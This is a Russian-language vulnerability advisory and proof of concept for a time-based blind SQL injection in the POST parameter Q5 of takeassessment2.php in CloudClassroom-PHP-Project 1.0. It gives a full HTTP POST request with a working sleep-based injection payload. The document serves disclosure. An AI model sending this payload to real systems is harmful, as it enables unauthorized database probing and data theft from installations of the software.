
Доказательство концепции уязвимости слепой SQL-инъекции на основе времени в конечной точке takeassessment2.php проекта CloudClassroom-PHP-Project 1.0, демонстрирующее удаленную эксплуатацию с помощью специально сформированного POST-запроса.
Уязвимость SQL-инъекции существует в конечной точке takeassessment2.php проекта CloudClassroom-PHP-Project 1.0, где параметр POST Q5 напрямую встраивается в SQL-запросы без санитизации.
Тип уязвимости :
SQL Injection
Поставщик продукта :
https://github.com/mathurvishal/CloudClassroom-PHP-Project
База кода затронутого продукта :
https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0
Затронутый компонент :
takeassessment2.php, параметр POST Q5, логика SQL-запроса
Векторы атаки :
Для эксплуатации этой уязвимости злоумышленник отправляет вредоносный POST-запрос к /CloudClassroom-PHP-Project-master/takeassessment2.php с полезной нагрузкой в параметре Q5, которая вызывает временную задержку в обработке SQL (слепая time-based SQL-инъекция).
POST Request:
POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded
Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done= Это вызывает шестисекундную задержку в ответе, что подтверждает уязвимость.
Ссылка :
https://owasp.org/www-community/attacks/SQL_Injection
Обнаружил : saurabh solanki